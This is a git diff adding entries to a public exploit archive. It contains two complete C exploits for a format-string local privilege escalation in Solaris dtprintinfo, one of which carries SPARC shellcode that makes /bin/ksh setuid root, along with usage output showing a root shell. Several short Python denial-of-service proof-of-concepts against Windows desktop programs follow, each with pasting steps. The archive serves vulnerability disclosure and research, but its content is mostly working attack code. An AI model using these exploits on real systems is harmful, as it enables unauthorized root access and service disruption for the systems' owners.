+/* globals */
+char *arg[2] = {"foo", NULL};
+char *env[256];
+int env_pos = 0, env_len = 0;
+
+/* prototypes */
+int add_env(char *string);
+void check_zero(int addr, char *pattern);
+int get_env_addr(char *path, char **argv);
+int search_ldso(char *sym);
+int search_rwx_mem(void);
+void set_val(char *buf, int pos, int val);
+
+/*
+ * main()
+ */
+int main(int argc, char **argv)
+{
+ char buf[BUFSIZE], *p = buf, buf2[BUFSIZE2];
+ char platform[256], release[256], display[256];
+ int env_addr, sc_addr, retloc = RETLOC, i0loc, i1loc, i7loc;
+ int offset = OFFSET;
+
+ int sb = ((int)argv[0] | 0xffff) & 0xfffffffc;
+ int ret = search_ldso("sprintf");
+ int rwx_mem = search_rwx_mem() + 24; /* stable address */
+
+ int i, stackpops = STACKPOPS;
+ unsigned char b1, b2, b3, b4;
+ unsigned base, n[16]; /* must be unsigned */
+
+ /* lpstat code to add a fake printer */
+ if (!strcmp(argv[0], "lpstat")) {
+
+ /* check command line */
+ if (argc != 2)
+ exit(1);
+
+ /* print the expected output and exit */
+ if(!strcmp(argv[1], "-v")) {
+ fprintf(stderr, "lpstat called with -v\n");
+ printf("device for fnord: /dev/null\n");
+ } else {
+ fprintf(stderr, "lpstat called with -d\n");
+ printf("system default destination: fnord\n");
+ }
+ exit(0);
+ }
+
+ /* helper program that prints argv[0] address, used by get_env_addr() */
+ if (!strcmp(argv[0], "foo")) {
+ printf("0x%p\n", argv[0]);
+ exit(0);
+ }
+
+ /* print exploit information */
+ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
+
+ /* process command line */
+ if ((argc < 2) || (argc > 4)) {
+#ifdef USE_EXEC_SC
+ fprintf(stderr, "usage: %s xserver:display [retloc] [offset]\n\n", argv[0]);
+#else
+ fprintf(stderr, "usage:\n$ %s xserver:display [retloc] [offset]\n$ /bin/ksh\n\n", argv[0]);
+#endif /* USE_EXEC_SC */
+ exit(1);
+ }
+ sprintf(display, "DISPLAY=%s", argv[1]);
+ if (argc > 2)
+ retloc = (int)strtoul(argv[2], (char **)NULL, 0);
+ if (argc > 3)
+ offset = (int)strtoul(argv[3], (char **)NULL, 0);
+
+ /* calculate saved %i0 and %i7 locations based on retloc */
+ i0loc = retloc + offset;
+ i1loc = i0loc + 4;
+ i7loc = i0loc + 28;
+
+ /* evil env var: name + shellcode + padding */
+ memset(buf, 'A', sizeof(buf));
+ buf[sizeof(buf) - 1] = 0x0;
+ memcpy(buf, "REQ_DIR=", strlen("REQ_DIR="));
+ p += strlen("REQ_DIR=");
+
+ /* padding buffer to avoid stack overflow */
+ memset(buf2, 'B', sizeof(buf2));
+ buf2[sizeof(buf2) - 1] = 0x0;
+
+ /* fill the envp, keeping padding */
+ add_env(buf2);
+ add_env(buf);
+ add_env(display);
+ add_env("TMP_DIR=/tmp");
+ add_env("PATH=.:/usr/bin");
+ sc_addr = add_env("HOME=/tmp");
+ add_env(sc);
+ add_env(NULL);
+
+ /* calculate the needed addresses */
+ env_addr = get_env_addr(VULN, argv);
+ sc_addr += env_addr;
+
+#ifdef USE_EXEC_SC
+ /* populate exec shellcode placeholder */
+ set_val(sc, 48, sb - 1024);
+#endif /* USE_EXEC_SC */
+
+ /* format string: saved ret */
+ *((void **)p) = (void *)(retloc); p += 4; /* 0x000000ff */
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(retloc); p += 4; /* 0x00ff0000 */
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(retloc); p += 4; /* 0xff000000 */
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(retloc + 2); p += 4; /* 0x0000ff00 */
+ memset(p, 'A', 4); p += 4; /* dummy */
+
+ /* format string: saved %i0: 1st arg to sprintf() */
+ *((void **)p) = (void *)(i0loc); p += 4; /* 0x000000ff */
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(i0loc); p += 4; /* 0x00ff0000 */
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(i0loc); p += 4; /* 0xff000000 */
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(i0loc + 2); p += 4; /* 0x0000ff00 */
+ memset(p, 'A', 4); p += 4; /* dummy */
+
+ /* format string: saved %i7: return address */
+ *((void **)p) = (void *)(i7loc); p += 4; /* 0x000000ff */
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(i7loc); p += 4; /* 0x00ff0000 */
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(i7loc); p += 4; /* 0xff000000 */
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(i7loc + 2); p += 4; /* 0x0000ff00 */
+ memset(p, 'A', 4); p += 4; /* dummy */
+
+ /* format string: saved %i1: 2nd arg to sprintf() */
+ *((void **)p) = (void *)(i1loc); p += 4; /* 0x000000ff */
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(i1loc); p += 4; /* 0x00ff0000 */
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(i1loc); p += 4; /* 0xff000000 */
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(i1loc + 2); p += 4; /* 0x0000ff00 */
+
+ /* format string: stackpop sequence */
+ base = p - buf - strlen("REQ_DIR=");
+ for (i = 0; i < stackpops; i++, p += strlen(STACKPOPSEQ), base += 8)
+ memcpy(p, STACKPOPSEQ, strlen(STACKPOPSEQ));
+
+ /* calculate numeric arguments for retloc */
+ SPLITB(b1, b2, b3, b4, (ret - 4));
+ CALCARGS(n[0], n[1], n[2], n[3], b1, b2, b3, b4, base);
+
+ /* calculate numeric arguments for i0loc */
+ SPLITB(b1, b2, b3, b4, rwx_mem);
+ CALCARGS(n[4], n[5], n[6], n[7], b1, b2, b3, b4, base);
+
+ /* calculate numeric arguments for i7loc */
+ SPLITB(b1, b2, b3, b4, (rwx_mem - 8));
+ CALCARGS(n[8], n[9], n[10], n[11], b1, b2, b3, b4, base);
+
+ /* calculate numeric arguments for i1loc */
+ SPLITB(b1, b2, b3, b4, sc_addr);
+ CALCARGS(n[12], n[13], n[14], n[15], b1, b2, b3, b4, base);
+
+ /* check for potentially dangerous numeric arguments below 10 */
+ for (i = 0; i < 16; i++)
+ n[i] += (n[i] < 10) ? (0x100) : (0);
+
+ /* format string: write string */
+ sprintf(p, "%%.%dx%%n%%.%dx%%hn%%.%dx%%hhn%%.%dx%%hhn%%.%dx%%n%%.%dx%%hn%%.%dx%%hhn%%.%dx%%hhn%%.%dx%%n%%.%dx%%hn%%.%dx%%hhn%%.%dx%%hhn%%.%dx%%n%%.%dx%%hn%%.%dx%%hhn%%.%dx%%hhn", n[0], n[1], n[2], n[3], n[4], n[5], n[6], n[7], n[8], n[9], n[10], n[11], n[12], n[13], n[14], n[15]);
+ buf[strlen(buf)] = 'A'; /* preserve buf length */
+
+ /* we need at least one directory inside TMP_DIR to trigger the bug */
+ mkdir("/tmp/one_dir", S_IRWXU | S_IRWXG | S_IRWXO);
+
+ /* create a symlink for the fake lpstat */
+ unlink("lpstat");
+ symlink(argv[0], "lpstat");
+
+ /* print some output */
+ sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
+ sysinfo(SI_RELEASE, release, sizeof(release) - 1);
+ fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
+ fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
+ fprintf(stderr, "Using ret location\t: 0x%p\n", (void *)retloc);
+ fprintf(stderr, "Using %%i0 location\t: 0x%p\n", (void *)i0loc);
+ fprintf(stderr, "Using %%i1 location\t: 0x%p\n", (void *)i1loc);
+ fprintf(stderr, "Using %%i7 location\t: 0x%p\n", (void *)i7loc);
+ fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
+ fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
+ fprintf(stderr, "Using sprintf() address\t: 0x%p\n\n", (void *)ret);
+
+ /* check for null bytes (add some padding to env if needed) */
+ check_zero(retloc, "ret location");
+ check_zero(i0loc, "%%i0 location");
+ check_zero(i1loc, "%%i1 location");
+ check_zero(i7loc, "%%i7 location");
+ check_zero(rwx_mem, "rwx_mem address");
+ check_zero(sc_addr, "sc address");
+
+ /* run the vulnerable program */
+ execve(VULN, arg, env);
+ perror("execve");
+ exit(1);
+}
+
+/*
+ * add_env(): add a variable to envp and pad if needed
+ */
+int add_env(char *string)
+{
+ int i;
+
+ /* null termination */
+ if (!string) {
+ env[env_pos] = NULL;
+ return env_len;
+ }
+
+ /* add the variable to envp */
+ env[env_pos] = string;
+ env_len += strlen(string) + 1;
+ env_pos++;
+
+ /* pad the envp using zeroes */
+ if ((strlen(string) + 1) % 4)
+ for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
+ env[env_pos] = string + strlen(string);
+ env_len++;
+ }
+
+ return env_len;
+}
+
+/*
+ * check_zero(): check an address for the presence of a 0x00
+ */
+void check_zero(int addr, char *pattern)
+{
+ if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
+ !(addr & 0xff000000)) {
+ fprintf(stderr, "error: %s contains a 0x00!\n", pattern);
+ exit(1);
+ }
+}
+
+/*
+ * get_env_addr(): get environment address using a helper program
+ */
+int get_env_addr(char *path, char **argv)
+{
+ char prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
+ char hex[11] = "\x00";
+ int fd[2], addr;
+
+ /* truncate program name at correct length and create a hard link */
+ prog[strlen(path)] = 0x0;
+ unlink(prog);
+ link(argv[0], prog);
+
+ /* open pipe to read program output */
+ if (pipe(fd) < 0) {
+ perror("pipe");
+ exit(1);
+ }
+
+ switch(fork()) {
+
+ case -1: /* cannot fork */
+ perror("fork");
+ exit(1);
+
+ case 0: /* child */
+ dup2(fd[1], 1);
+ close(fd[0]);
+ close(fd[1]);
+ execve(prog, arg, env);
+ perror("execve");
+ exit(1);
+
+ default: /* parent */
+ close(fd[1]);
+ read(fd[0], hex, sizeof(hex));
+ break;
+ }
+
+ /* check and return address */
+ if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) {
+ fprintf(stderr, "error: cannot read ff address from helper program\n");
+ exit(1);
+ }
+ return addr + 4;
+}
+
+/*
+ * search_ldso(): search for a symbol inside ld.so.1
+ */
+int search_ldso(char *sym)
+{
+ int addr;
+ void *handle;
+ Link_map *lm;
+
+ /* open the executable object file */
+ if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
+ perror("dlopen");
+ exit(1);
+ }
+
+ /* get dynamic load information */
+ if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
+ perror("dlinfo");
+ exit(1);
+ }
+
+ /* search for the address of the symbol */
+ if ((addr = (int)dlsym(handle, sym)) == NULL) {
+ fprintf(stderr, "error: sorry, function %s() not found\n", sym);
+ exit(1);
+ }
+
+ /* close the executable object file */
+ dlclose(handle);
+
+ check_zero(addr - 4, sym);
+ return addr;
+}
+
+/*
+ * search_rwx_mem(): search for an RWX memory segment valid for all
+ * programs (typically, /usr/lib/ld.so.1) using the proc filesystem
+ */
+int search_rwx_mem(void)
+{
+ int fd;
+ char tmp[16];
+ prmap_t map;
+ int addr = 0, addr_old;
+
+ /* open the proc filesystem */
+ sprintf(tmp,"/proc/%d/map", (int)getpid());
+ if ((fd = open(tmp, O_RDONLY)) < 0) {
+ fprintf(stderr, "error: can't open %s\n", tmp);
+ exit(1);
+ }
+
+ /* search for the last RWX memory segment before stack (last - 1) */
+ while (read(fd, &map, sizeof(map)))
+ if (map.pr_vaddr)
+ if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
+ addr_old = addr;
+ addr = map.pr_vaddr;
+ }
+ close(fd);
+
+ /* add 4 to the exact address null bytes */
+ if (!(addr_old & 0xff))
+ addr_old |= 0x04;
+ if (!(addr_old & 0xff00))
+ addr_old |= 0x0400;
+
+ return addr_old;
+}
+
+/*
+ * set_val(): copy a dword inside a buffer
+ */
+void set_val(char *buf, int pos, int val)
+{
+ buf[pos] = (val & 0xff000000) >> 24;
+ buf[pos + 1] = (val & 0x00ff0000) >> 16;
+ buf[pos + 2] = (val & 0x0000ff00) >> 8;
+ buf[pos + 3] = (val & 0x000000ff);
+}
\ No newline at end of file
diff --git a/exploits/solaris/local/49517.c b/exploits/solaris/local/49517.c
new file mode 100644
index 000000000..915a5f9c7
--- /dev/null
+++ b/exploits/solaris/local/49517.c
@@ -0,0 +1,309 @@
+# Exploit Title: Solaris 10 1/13 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)
+# Date: 2021-02-01
+# Exploit Author: Marco Ivaldi
+# Vendor Homepage: https://www.oracle.com/solaris/solaris10/
+# Version: Solaris 10
+# Tested on: Solaris 10 1/13 SPARC
+
+/*
+ * raptor_dtprintcheckdir_sparc2.c - Solaris/SPARC FMT LPE
+ * Copyright (c) 2020 Marco Ivaldi
+ *
+ * "You still haven't given up on me?" -- Bruce Wayne
+ * "Never!" -- Alfred Pennyworth
+ *
+ * I would like to thank ~A. for his incredible research work spanning decades,
+ * an endless source of inspiration for me.
+ *
+ * Whoah, this one wasn't easy! This is a pretty lean exploit now, but its
+ * development took me some time. It's been almost two weeks, and I came
+ * close to giving up a couple of times. Here's a summary of the main
+ * roadblocks and complications I ran into while porting my dtprintinfo
+ * format string exploit to SPARC:
+ *
+ * - Half word writes and similar techniques that need to print a large amount
+ * of chars are problematic, because we have both a format string bug and a
+ * stack-based buffer overflow, and we risk running out of stack space! We
+ * might be able to prevent this by increasing the size of the padding buffer,
+ * (buf2) but your mileage may vary.
+ *
+ * - I therefore opted for a more portable single-byte write, but SPARC is a
+ * RISC architecture and as such it's not happy with memory operations on
+ * misaligned addresses... So I had to figure out a possibly novel technique
+ * to prevent the dreaded Bus Error. It involves the %hhn format string, check
+ * it out!
+ *
+ * - Once I had my write-what primitive figured out, I needed to pick a suitable
+ * memory location to patch... and I almost ran out of options. Function
+ * activation records turned out to be cumbersome and unreliable (see my PoC
+ * raptor_dtprintcheckdir_sparc.c), .plt entries in the vulnerable binary
+ * start with a null byte, and the usual OS function pointers that were
+ * popular targets 15 years ago are not present in modern Solaris 10 releases
+ * anymore. Finally, I noticed that the libc also contains .plt jump codes
+ * that get executed upon function calling. Since they don't start with a null
+ * byte, I decided to target them.
+ *
+ * - Instead of meddling with jump codes, to keep things simpler I decided to
+ * craft the shellcode directly in the .plt section of libc by exploiting the
+ * format string bug. This technique proved to be very effective, but
+ * empirical tests showed that (for unknown reasons) the shellcode size was
+ * limited to 36 bytes. It looks like there's a limit on the number of args,
+ * to sprintf(), unrelated to where we write in memory. Who cares, 36 bytes
+ * are just enough to escalate privileges.
+ *
+ * After I plugged a small custom shellcode into my exploit, it worked like a
+ * charm. Simple, isn't it?;)
+ *
+ * To get the libc base, use pmap on the dtprintinfo process, e.g.:
+ * $ pmap 4190 | grep libc.so.1 | grep r-x
+ * FE800000 1224K r-x-- /lib/libc.so.1
+ *
+ * To grab the offset to strlen in .plt, you can use objdump as follows:
+ * $ objdump -R /usr/lib/libc.so.1 | grep strlen
+ * 0014369c R_SPARC_JMP_SLOT strlen
+ *
+ * This bug was likely fixed during the general cleanup of CDE code done by
+ * Oracle in response to my recently reported vulnerabilities. However, I can't
+ * confirm this because I have no access to their patches:/
+ *
+ * See also:
+ * raptor_dtprintcheckdir_intel.c (vulnerability found by Marti Guasch Jimenez)
+ * raptor_dtprintcheckdir_intel2.c
+ * raptor_dtprintcheckdir_sparc.c (just a proof of concept)
+ *
+ * Usage:
+ * $ gcc raptor_dtprintcheckdir_sparc2.c -o raptor_dtprintcheckdir_sparc2 -Wall
+ * [on your xserver: disable the access control]
+ * $ ./raptor_dtprintcheckdir_sparc2 10.0.0.104:0
+ * raptor_dtprintcheckdir_sparc2.c - Solaris/SPARC FMT LPE
+ * Copyright (c) 2020 Marco Ivaldi
+ *
+ * Using SI_PLATFORM : SUNW,SPARC-Enterprise (5.10)
+ * Using libc/.plt/strlen : 0xfe94369c
+ *
+ * Don't worry if you get a SIGILL, just run /bin/ksh anyway!
+ *
+ * lpstat called with -v
+ * lpstat called with -v
+ * lpstat called with -d
+ * [on your xserver: double click on the fake "fnord" printer]
+ * Illegal Instruction
+ * $ ls -l /bin/ksh
+ * -rwsrwsrwx 3 root bin 209288 Feb 21 2012 /bin/ksh
+ * $ ksh
+ * # id
+ * uid=100(user) gid=1(other) euid=0(root) egid=2(bin)
+ * #
+ *
+ * Tested on:
+ * SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise
+ * [previous Solaris versions are also likely vulnerable (and easier to exploit)]
+ */
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define INFO1 "raptor_dtprintcheckdir_sparc2.c - Solaris/SPARC FMT LPE"
+#define INFO2 "Copyright (c) 2020 Marco Ivaldi "
+
+#define VULN "/usr/dt/bin/dtprintinfo" // vulnerable program
+#define BUFSIZE 3000 // size of evil env var
+#define BUFSIZE2 10000 // size of padding buf
+#define STACKPOPSEQ "%.8x" // stackpop sequence
+#define STACKPOPS 383 // number of stackpops
+
+/* default retloc is .plt/strlen in libc */
+#define LIBCBASE 0xfe800000 // base address of libc
+#define STRLEN 0x0014369c // .plt/strlen offset
+
+/* calculate numeric arguments for write string */
+#define CALCARGS(N1, N2, N3, N4, B1, B2, B3, B4, BASE) { \
+ N1 = (B4 - BASE) % 0x100; \
+ N2 = (B2 - BASE - N1) % 0x100; \
+ N3 = (B1 - BASE - N1 - N2) % 0x100; \
+ N4 = (B3 - BASE - N1 - N2 - N3) % 0x100; \
+ BASE += N1 + N2 + N3 + N4; \
+}
+
+char sc[] = /* Solaris/SPARC chmod() shellcode (max size is 36 bytes) */
+/* chmod("./me", 037777777777) */
+"\x92\x20\x20\x01" /* sub %g0, 1, %o1 */
+"\x20\xbf\xff\xff" /* bn,a */
+"\x20\xbf\xff\xff" /* bn,a */
+"\x7f\xff\xff\xff" /* call */
+"\x90\x03\xe0\x14" /* add %o7, 0x14, %o0 */
+"\xc0\x22\x20\x04" /* clr [ %o0 + 4 ] */
+"\x82\x10\x20\x0f" /* mov 0xf, %g1 */
+"\x91\xd0\x20\x08" /* ta 8 */
+"./me";
+
+/* globals */
+char *arg[2] = {"foo", NULL};
+char *env[256];
+int env_pos = 0, env_len = 0;
+
+/* prototypes */
+int add_env(char *string);
+void check_zero(int addr, char *pattern);
+
+/*
+ * main()
+ */
+int main(int argc, char **argv)
+{
+ char buf[BUFSIZE], *p = buf, buf2[BUFSIZE2];
+ char platform[256], release[256], display[256];
+ int retloc = LIBCBASE + STRLEN;
+
+ int i, stackpops = STACKPOPS;
+ unsigned base, n[strlen(sc)]; /* must be unsigned */
+
+ /* lpstat code to add a fake printer */
+ if (!strcmp(argv[0], "lpstat")) {
+
+ /* check command line */
+ if (argc != 2)
+ exit(1);
+
+ /* print the expected output and exit */
+ if(!strcmp(argv[1], "-v")) {
+ fprintf(stderr, "lpstat called with -v\n");
+ printf("device for fnord: /dev/null\n");
+ } else {
+ fprintf(stderr, "lpstat called with -d\n");
+ printf("system default destination: fnord\n");
+ }
+ exit(0);
+ }
+
+ /* print exploit information */
+ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
+
+ /* process command line */
+ if (argc < 2) {
+ fprintf(stderr, "usage:\n$ %s xserver:display [retloc]\n$ /bin/ksh\n\n", argv[0]);
+ exit(1);
+ }
+ sprintf(display, "DISPLAY=%s", argv[1]);
+ if (argc > 2)
+ retloc = (int)strtoul(argv[2], (char **)NULL, 0);
+
+ /* evil env var: name + shellcode + padding */
+ bzero(buf, sizeof(buf));
+ memcpy(buf, "REQ_DIR=", strlen("REQ_DIR="));
+ p += strlen("REQ_DIR=");
+
+ /* padding buffer to avoid stack overflow */
+ memset(buf2, 'B', sizeof(buf2));
+ buf2[sizeof(buf2) - 1] = 0x0;
+
+ /* fill the envp, keeping padding */
+ add_env(buf2);
+ add_env(buf);
+ add_env(display);
+ add_env("TMP_DIR=/tmp/just"); /* we must control this empty dir */
+ add_env("PATH=.:/usr/bin");
+ add_env("HOME=/tmp");
+ add_env(NULL);
+
+ /* format string: retloc */
+ for (i = retloc; i - retloc < strlen(sc); i += 4) {
+ check_zero(i, "ret location");
+ *((void **)p) = (void *)(i); p += 4; /* 0x000000ff */
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(i); p += 4; /* 0x00ff0000 */
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(i); p += 4; /* 0xff000000 */
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(i + 2); p += 4; /* 0x0000ff00 */
+ memset(p, 'A', 4); p += 4; /* dummy */
+ }
+
+ /* format string: stackpop sequence */
+ base = p - buf - strlen("REQ_DIR=");
+ for (i = 0; i < stackpops; i++, p += strlen(STACKPOPSEQ), base += 8)
+ memcpy(p, STACKPOPSEQ, strlen(STACKPOPSEQ));
+
+ /* calculate numeric arguments */
+ for (i = 0; i < strlen(sc); i += 4)
+ CALCARGS(n[i], n[i + 1], n[i + 2], n[i + 3], sc[i], sc[i + 1], sc[i + 2], sc[i + 3], base);
+
+ /* check for potentially dangerous numeric arguments below 10 */
+ for (i = 0; i < strlen(sc); i++)
+ n[i] += (n[i] < 10) ? (0x100) : (0);
+
+ /* format string: write string */
+ for (i = 0; i < strlen(sc); i += 4)
+ p += sprintf(p, "%%.%dx%%n%%.%dx%%hn%%.%dx%%hhn%%.%dx%%hhn", n[i], n[i + 1], n[i + 2], n[i + 3]);
+
+ /* setup the directory structure and the symlink to /bin/ksh */
+ unlink("/tmp/just/chmod/me");
+ rmdir("/tmp/just/chmod");
+ rmdir("/tmp/just");
+ mkdir("/tmp/just", S_IRWXU | S_IRWXG | S_IRWXO);
+ mkdir("/tmp/just/chmod", S_IRWXU | S_IRWXG | S_IRWXO);
+ symlink("/bin/ksh", "/tmp/just/chmod/me");
+
+ /* create a symlink for the fake lpstat */
+ unlink("lpstat");
+ symlink(argv[0], "lpstat");
+
+ /* print some output */
+ sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
+ sysinfo(SI_RELEASE, release, sizeof(release) - 1);
+ fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
+ fprintf(stderr, "Using libc/.plt/strlen\t: 0x%p\n\n", (void *)retloc);
+ fprintf(stderr, "Don't worry if you get a SIGILL, just run /bin/ksh anyway!\n\n");
+
+ /* run the vulnerable program */
+ execve(VULN, arg, env);
+ perror("execve");
+ exit(1);
+}
+
+/*
+ * add_env(): add a variable to envp and pad if needed
+ */
+int add_env(char *string)
+{
+ int i;
+
+ /* null termination */
+ if (!string) {
+ env[env_pos] = NULL;
+ return env_len;
+ }
+
+ /* add the variable to envp */
+ env[env_pos] = string;
+ env_len += strlen(string) + 1;
+ env_pos++;
+
+ /* pad the envp using zeroes */
+ if ((strlen(string) + 1) % 4)
+ for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
+ env[env_pos] = string + strlen(string);
+ env_len++;
+ }
+
+ return env_len;
+}
+
+/*
+ * check_zero(): check an address for the presence of a 0x00
+ */
+void check_zero(int addr, char *pattern)
+{
+ if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
+ !(addr & 0xff000000)) {
+ fprintf(stderr, "error: %s contains a 0x00!\n", pattern);
+ exit(1);
+ }
+}
\ No newline at end of file
diff --git a/exploits/windows/dos/49566.txt b/exploits/windows/dos/49566.txt
new file mode 100644
index 000000000..733789bbf
--- /dev/null
+++ b/exploits/windows/dos/49566.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)
+# Date: 2021-02-15
+# Exploit Author: Ismael Nava
+# Vendor Homepage: https://switchportmapper.com/
+# Software Link: https://switchportmapper.com/download.htm
+# Version: 2.85.2
+# Tested on: Windows 10 Home x64
+
+
+#STEPS
+# Open the program Managed Switch Port Mapping Tool
+# In the left side select Settings from Router/Srvr 1 (for layer 2 Switches)
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Gou.txt"
+# Paste the content in the field IP Address and SNMP v1/v2c Read Community Name
+# Click in OK
+# End :)
+
+
+buffer = 'F' * 10000
+
+try:
+ file = open("Gou2.txt","w")
+ file.write(buffer)
+ file.close()
+
+ print("Archive ready")
+except:
+ print("Archive no ready")
\ No newline at end of file
diff --git a/exploits/windows/dos/49567.txt b/exploits/windows/dos/49567.txt
new file mode 100644
index 000000000..bbc42d911
--- /dev/null
+++ b/exploits/windows/dos/49567.txt
@@ -0,0 +1,27 @@
+# Exploit Title: AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)
+# Date: 2021-02-15
+# Exploit Author: Ismael Nava
+# Vendor Homepage: http://agatasoft.com/
+# Software Link: http://agatasoft.com/Ping_Master_Pro.exe
+# Version: 2.1
+# Tested on: Windows 10 Home x64
+
+#STEPS
+# Open the program AgataSoft PingMaster Pro
+# In Tools select the option Trace Route
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Gou.txt"
+# Paste the content in the field Host name and click in Get IP from host name
+# End :)
+
+
+buffer = 'S' * 10000
+
+try:
+ file = open("Gou.txt","w")
+ file.write(buffer)
+ file.close()
+
+ print("Archive ready")
+except:
+ print("Archive no ready")
\ No newline at end of file
diff --git a/exploits/windows/dos/49568.txt b/exploits/windows/dos/49568.txt
new file mode 100644
index 000000000..ce7eeafbc
--- /dev/null
+++ b/exploits/windows/dos/49568.txt
@@ -0,0 +1,29 @@
+# Exploit Title: Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)
+# Date: 2021-02-15
+# Exploit Author: Ismael Nava
+# Vendor Homepage: https://www.nsauditor.com/
+# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Version: 3.2.2.0
+# Tested on: Windows 10 Home x64
+
+
+#STEPS
+# Open the program Nsauditor
+# In Options select Configuration...
+# Click in Security Events
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Liella.txt"
+# Paste the content in the field Event Description and click in Add Event
+# End :)
+
+
+buffer = 'U' * 10000
+
+try:
+ file = open("Liella.txt","w")
+ file.write(buffer)
+ file.close()
+
+ print("Archive ready")
+except:
+ print("Archive no ready")
\ No newline at end of file
diff --git a/exploits/windows/dos/49590.py b/exploits/windows/dos/49590.py
new file mode 100755
index 000000000..63873cc37
--- /dev/null
+++ b/exploits/windows/dos/49590.py
@@ -0,0 +1,30 @@
+# Exploit Title: Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC)
+# Exploit Author : Sinem Şahin
+# Exploit Date: 2021-02-23
+# Vendor Homepage : http://www.nsauditor.com/
+# Link Software : http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
+# Version: 4.2.7
+# Tested on: Windows 7 x64
+
+
+# Steps:
+1- Run the python script. (exploit.py)
+2- Open payload.txt and copy content to clipboard.
+3- Run 'Product Key Explorer 4.2.7'.
+4- Register -> Enter Registration Code
+5- Paste clipboard into the "Key" or "Name".
+6- Click on OK.
+7- Crashed.
+
+---> exploit.py <--
+
+#!/usr/bin/env python
+buffer = "\x41" * 300
+
+try:
+ f = open("payload.txt","w")
+ f.write(buffer)
+ f.close()
+ print "File created!"
+except:
+ print "File cannot be created!!"
\ No newline at end of file
diff --git a/exploits/windows/dos/49844.py b/exploits/windows/dos/49844.py
new file mode 100755
index 000000000..6a2533599
--- /dev/null
+++ b/exploits/windows/dos/49844.py
@@ -0,0 +1,18 @@
+# Exploit Title: Sandboxie 5.49.7 - Denial of Service (PoC)
+# Date: 06/05/2021
+# Author: Erick Galindo
+# Vendor Homepage: https://sandboxie-plus.com/
+# Software https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.4/Sandboxie-Classic-x64-v5.49.7.exe
+# Version: 5.49.7
+# Tested on: Windows 10 Pro x64 es
+
+# Proof of Concept:
+#1.- Copy printed "AAAAA..." string to clipboard!
+#2.- Sandboxie Control->Sandbox->Set Container Folder
+#3.- Paste the buffer in the input then press ok
+
+buffer = "\x41" * 5000
+
+f = open ("Sandboxie10.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/49898.txt b/exploits/windows/dos/49898.txt
new file mode 100644
index 000000000..203ae528a
--- /dev/null
+++ b/exploits/windows/dos/49898.txt
@@ -0,0 +1,30 @@
+# Exploit Title: iDailyDiary 4.30 - Denial of Service (PoC)
+# Date: 2021-05-21
+# Exploit Author: Ismael Nava
+# Vendor Homepage: https://www.splinterware.com/index.html
+# Software Link: https://www.splinterware.com/download/iddfree.exe
+# Version: 4.30
+# Tested on: Windows 10 Home x64
+
+#STEPS
+# Open the program iDailyDiary
+# Create a New Diary, put any name and check the option "Do not prompt for password", click in OK
+# In the tab "View", click in "Preferences"
+# Click in the option "Tabs"
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Sotsu.txt"
+# Paste the content in the field below "Default diary tab name when creating new tabs"
+# Click in Apply
+# End :)
+
+
+buffer = 'F' * 2000000
+
+try:
+ file = open("Sotsu.txt","w")
+ file.write(buffer)
+ file.close()
+
+ print("Archive ready")
+except:
+ print("Archive no ready")
\ No newline at end of file
diff --git a/exploits/windows/dos/49906.py b/exploits/windows/dos/49906.py
new file mode 100755
index 000000000..b4429c942
--- /dev/null
+++ b/exploits/windows/dos/49906.py
@@ -0,0 +1,29 @@
